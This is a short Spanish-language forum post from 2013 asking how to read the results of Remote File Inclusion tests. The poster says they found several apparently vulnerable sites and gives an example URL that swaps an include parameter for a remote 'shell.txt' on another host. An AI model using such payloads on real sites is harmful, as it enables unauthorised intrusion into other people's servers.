pregunta sobre RFI

Iniciado por aivx, 18 Septiembre 2013, 19:39 PM

0 Miembros y 1 Visitante están viendo este tema.

aivx

buen día, leyendo un poco me encontre con el vejo RFI, me puse a buscar y encontre varias paginas vulnerables a ello todavia o que por lo menos parecen, mi pregunta es:


cuando en lugar de abrir en php el archivo de rfi lo abre como texto, significa que NO es vulnerable?

ejemplo:

ejemplo.com/index.php?index=index2.php lo cambiamos a
ejemplo.com/index.php?index=www.ejemplo3.com/shell.txt

me abre el archivo como txt o gif, o jpp o cualquier formato, pero no en php, significa que NO es vulnerable no?

sin embargo cuando lo dejo en formato php si me abre la pagina estilo iframe pero tomando los datos del server remoto

alguien me ayuda a entender eso?

saludos!